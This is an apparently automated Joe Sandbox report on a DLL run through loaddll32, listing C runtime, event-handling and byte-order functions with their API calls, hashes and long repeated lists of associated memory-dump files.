Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: ^l
API String ID: 3074076210-2649338665
Opcode ID: 717501f16262f5c244c50c01c0dd992f92c38cff826a49e209e13938724162e3
Instruction ID: 8c2d985af81dee1007cd342686d599cd6ee941e1ac7f90c892bcfa89ae7c8cbf
Opcode Fuzzy Hash: 717501f16262f5c244c50c01c0dd992f92c38cff826a49e209e13938724162e3
Instruction Fuzzy Hash: 7AE0E53170020EA7DB04EBE4CE46EEE7B3DAB01248F300469E83466E90DB30D658D692

Function 6CEB3FF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB3FF9
__localtime64.LIBCMT ref: 6CEB4004

Part of subcall function 6CECAD70: __gmtime64_s.LIBCMT ref: 6CECAD83

std::exception::exception.LIBCMT ref: 6CEB401C

Part of subcall function 6CECAC43: std::exception::_Copy_str.LIBCMT ref: 6CECAC5C

Part of subcall function 6CEBEA32: __CxxThrowException@8.LIBCMT ref: 6CEBEA88

Strings

p`l, xrefs: 6CEB4011

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Copy_strException@8H_prologThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
String ID: p`l
API String ID: 1621560660-1990446826
Opcode ID: 5f19706add10e028de1d01f3672c14b169d78f0c515ddcdebb38e0607f176fe0
Instruction ID: 793d233e509f023e8333f9ed128fa7bbd10feb3c19fa2bfc14585763d4b4cd60
Opcode Fuzzy Hash: 5f19706add10e028de1d01f3672c14b169d78f0c515ddcdebb38e0607f176fe0
Instruction Fuzzy Hash: AEE06DB6D4060D9BCB04DFA0CA027FEB738FB04348F60455DD820A7B90DB34A7498B92

Function 6CEC9A80 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CEB4C5D), ref: 6CEC9B1F

Part of subcall function 6CEB4ABB: __EH_prolog.LIBCMT ref: 6CEB4AC0
Part of subcall function 6CEB4ABB: CreateEventA.KERNEL32(00000000,000000FF,6CEBF5E0,00000000), ref: 6CEB4AD2

CloseHandle.KERNEL32(00000000), ref: 6CEC9B14
CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,6CEB4C5D), ref: 6CEC9B60
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CEB4C5D), ref: 6CEC9C31

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CloseHandle$Event$CreateH_prolog
String ID:
API String ID: 2825413587-0
Opcode ID: d519e66b9ae1febeffaef3b74187f631080edea840b578f0b4a5faa13c170e4c
Instruction ID: 3e305fd02ca7ef200221a3a428e795cdf619d7e093f6fcfe6ac8fa6bd58873eb
Opcode Fuzzy Hash: d519e66b9ae1febeffaef3b74187f631080edea840b578f0b4a5faa13c170e4c
Instruction Fuzzy Hash: 1851CD717046459BDB00CF28CA84B9AB7F4EF8832CF294618F87997790DB35E805CB96

Function 6CECBF00 Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CECBF96
__flush.LIBCMT ref: 6CECBFB6
__write.LIBCMT ref: 6CECBFE9
__flsbuf.LIBCMT ref: 6CECC017

Part of subcall function 6CECE5AB: __getptd_noexit.LIBCMT ref: 6CECE5AB

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: bdb6a368898db23cce60cfab8629ab865d261dec7acaeb72aae285b892a37892
Instruction ID: 933f1fb9f6b65ffb278d630ba29282213778e28f09cb956f45c10d65545bc336
Opcode Fuzzy Hash: bdb6a368898db23cce60cfab8629ab865d261dec7acaeb72aae285b892a37892
Instruction Fuzzy Hash: B541E331B016469BDB08CE69CA925AE77B6AF4136CB30822DE835C7B40D771DD418F52

Function 6CED8CC4 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6CED8CFA
__isleadbyte_l.LIBCMT ref: 6CED8D28
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,6CEDC1D0,?,00BFBBEF,00000003), ref: 6CED8D56
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,6CEDC1D0,?,00BFBBEF,00000003), ref: 6CED8D8C

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 28c4e4ca8868cee364f6b1291e563dce4409286dbf533b5a9218f75b064fd511
Instruction ID: 612fc8eba0294dd49be5a7e96fc45283c2ca2a435eccce29088766c76ef5bd94
Opcode Fuzzy Hash: 28c4e4ca8868cee364f6b1291e563dce4409286dbf533b5a9218f75b064fd511
Instruction Fuzzy Hash: C331C23160524AAFDB218E25C844BAA7BB9FF42318F32511AE861976D0D730E852CBD1

Function 6CEB468E Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 6CEB46B2

Part of subcall function 6CEB448F: __EH_prolog.LIBCMT ref: 6CEB4494
Part of subcall function 6CEB448F: std::bad_exception::bad_exception.LIBCMT ref: 6CEB44A9

htonl.WS2_32(00000000), ref: 6CEB46C9
htonl.WS2_32(00000000), ref: 6CEB46D0
htons.WS2_32(?), ref: 6CEB46E4

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
String ID:
API String ID: 3882411702-0
Opcode ID: 8b33ce63ffe1be535e66ed8091c25c62c93c2d2b41baa4f3f259647792ddbddc
Instruction ID: 509c7893d2aa3d1c9deaa89c73299122e0a0d0147d2d24bccf99b0f0e9ffad4b
Opcode Fuzzy Hash: 8b33ce63ffe1be535e66ed8091c25c62c93c2d2b41baa4f3f259647792ddbddc
Instruction Fuzzy Hash: EA118276600258ABCF01DFA4C9859AAB7B9EF0E315F10845AFC05EF244EB719D14C7A1

Function 6CED570B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6CED572F

Part of subcall function 6CED5E16: __fltout2.LIBCMT ref: 6CED5E3F

__cftog_l.LIBCMT ref: 6CED5755
__cftoe_l.LIBCMT ref: 6CED5787

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
